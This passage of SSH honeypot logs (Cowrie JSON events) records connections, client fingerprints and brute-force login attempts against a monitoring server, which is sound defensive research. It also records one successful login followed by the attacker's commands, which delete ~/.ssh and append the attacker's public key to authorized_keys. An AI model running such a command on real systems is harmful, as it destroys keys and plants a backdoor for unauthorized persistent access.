ac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:46:58.016723Z","src_ip":"212.227.125.160","session":"e1d493c05dd8"}
{"eventid":"cowrie.login.failed","username":"squid","password":"squid","message":"login attempt [squid/squid] failed","sensor":"my-vps","timestamp":"2025-08-26T13:46:59.755675Z","src_ip":"212.227.125.160","session":"e1d493c05dd8"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:47:02.221064Z","src_ip":"212.227.125.160","session":"e1d493c05dd8"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":47660,"dst_ip":"1.2.3.4","dst_port":22,"session":"d716c902754f","protocol":"ssh","message":"New connection: 167.99.49.89:47660 (1.2.3.4:22) [session: d716c902754f]","sensor":"my-vps","timestamp":"2025-08-26T13:47:09.817641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:47:09.818511Z","src_ip":"167.99.49.89","session":"d716c902754f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:47:09.909746Z","src_ip":"167.99.49.89","session":"d716c902754f"}
{"eventid":"cowrie.login.failed","username":"panda","password":"123456","message":"login attempt [panda/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T13:47:10.315348Z","src_ip":"167.99.49.89","session":"d716c902754f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:47:11.409656Z","src_ip":"167.99.49.89","session":"d716c902754f"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":36774,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a2139c3b373","protocol":"ssh","message":"New connection: 193.32.162.145:36774 (1.2.3.4:22) [session: 8a2139c3b373]","sensor":"my-vps","timestamp":"2025-08-26T13:47:22.706805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:47:22.707817Z","src_ip":"193.32.162.145","session":"8a2139c3b373"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:47:22.737924Z","src_ip":"193.32.162.145","session":"8a2139c3b373"}
{"eventid":"cowrie.login.failed","username":"solana","password":"Solana","message":"login attempt [solana/Solana] failed","sensor":"my-vps","timestamp":"2025-08-26T13:47:22.830903Z","src_ip":"193.32.162.145","session":"8a2139c3b373"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:47:23.206305Z","src_ip":"212.227.235.229","session":"25088f95c6d0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:47:23.862900Z","src_ip":"193.32.162.145","session":"8a2139c3b373"}
{"eventid":"cowrie.session.connect","src_ip":"51.19.64.106","src_port":59536,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ada34d8ab08","protocol":"ssh","message":"New connection: 51.19.64.106:59536 (1.2.3.4:22) [session: 0ada34d8ab08]","sensor":"my-vps","timestamp":"2025-08-26T13:47:32.456502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_9.2p1 -2+deb12u3","message":"Remote SSH version: SSH-2.0-OpenSSH_9.2p1 -2+deb12u3","sensor":"my-vps","timestamp":"2025-08-26T13:47:32.457134Z","src_ip":"51.19.64.106","session":"0ada34d8ab08"}
{"eventid":"cowrie.client.kex","hassh":"aae6b9604f6f3356543709a376d7f657","hasshAlgorithms":"sntrup761x25519-sha512@openssh.com,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["sntrup761x25519-sha512@openssh.com","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: aae6b9604f6f3356543709a376d7f657","sensor":"my-vps","timestamp":"2025-08-26T13:47:32.500247Z","src_ip":"51.19.64.106","session":"0ada34d8ab08"}
{"eventid":"cowrie.session.connect","src_ip":"51.19.64.106","src_port":59548,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c5ede8960bc","protocol":"ssh","message":"New connection: 51.19.64.106:59548 (1.2.3.4:22) [session: 5c5ede8960bc]","sensor":"my-vps","timestamp":"2025-08-26T13:47:32.521472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_9.2p1 -2+deb12u3","message":"Remote SSH version: SSH-2.0-OpenSSH_9.2p1 -2+deb12u3","sensor":"my-vps","timestamp":"2025-08-26T13:47:32.566531Z","src_ip":"51.19.64.106","session":"5c5ede8960bc"}
{"eventid":"cowrie.client.kex","hassh":"aae6b9604f6f3356543709a376d7f657","hasshAlgorithms":"sntrup761x25519-sha512@openssh.com,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["sntrup761x25519-sha512@openssh.com","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: aae6b9604f6f3356543709a376d7f657","sensor":"my-vps","timestamp":"2025-08-26T13:47:32.598163Z","src_ip":"51.19.64.106","session":"5c5ede8960bc"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberryraspberry993311","message":"login attempt [pi/raspberryraspberry993311] failed","sensor":"my-vps","timestamp":"2025-08-26T13:47:32.794129Z","src_ip":"51.19.64.106","session":"0ada34d8ab08"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:47:33.843841Z","src_ip":"51.19.64.106","session":"0ada34d8ab08"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-26T13:47:33.978824Z","src_ip":"51.19.64.106","session":"5c5ede8960bc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:47:35.014974Z","src_ip":"51.19.64.106","session":"5c5ede8960bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60786,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7733a2bcb8a","protocol":"ssh","message":"New connection: 212.227.125.160:60786 (1.2.3.4:22) [session: b7733a2bcb8a]","sensor":"my-vps","timestamp":"2025-08-26T13:47:44.260411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:47:44.277838Z","src_ip":"212.227.125.160","session":"b7733a2bcb8a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:47:44.540497Z","src_ip":"212.227.125.160","session":"b7733a2bcb8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53358,"dst_ip":"1.2.3.4","dst_port":22,"session":"33db66103521","protocol":"ssh","message":"New connection: 212.227.235.229:53358 (1.2.3.4:22) [session: 33db66103521]","sensor":"my-vps","timestamp":"2025-08-26T13:47:45.644468Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:47:45.645413Z","src_ip":"212.227.235.229","session":"33db66103521"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:47:46.657888Z","src_ip":"212.227.235.229","session":"33db66103521"}
{"eventid":"cowrie.login.success","username":"root","password":"P4ssw0rd","message":"login attempt [root/P4ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:47:47.621277Z","src_ip":"212.227.235.229","session":"33db66103521"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:47:48.273929Z","src_ip":"212.227.235.229","session":"33db66103521"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:47:48.274810Z","src_ip":"212.227.235.229","session":"33db66103521"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:47:48.276089Z","src_ip":"212.227.235.229","session":"33db66103521"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:47:49.115747Z","src_ip":"212.227.235.229","session":"33db66103521"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:47:49.616271Z","src_ip":"212.227.235.229","session":"33db66103521"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:47:49.617081Z","src_ip":"212.227.235.229","session":"33db66103521"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:47:49.860778Z","src_ip":"212.227.235.229","session":"33db66103521"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:47:49.861835Z","src_ip":"212.227.235.229","session":"33db66103521"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53360,"dst_ip":"1.2.3.4","dst_port":22,"session":"f91c661fb932","protocol":"ssh","message":"New connection: 212.227.235.229:53360 (1.2.3.4:22) [session: f91c661fb932]","sensor":"my-vps","timestamp":"2025-08-26T13:47:50.111024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:47:50.111742Z","src_ip":"212.227.235.229","session":"f91c661fb932"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ct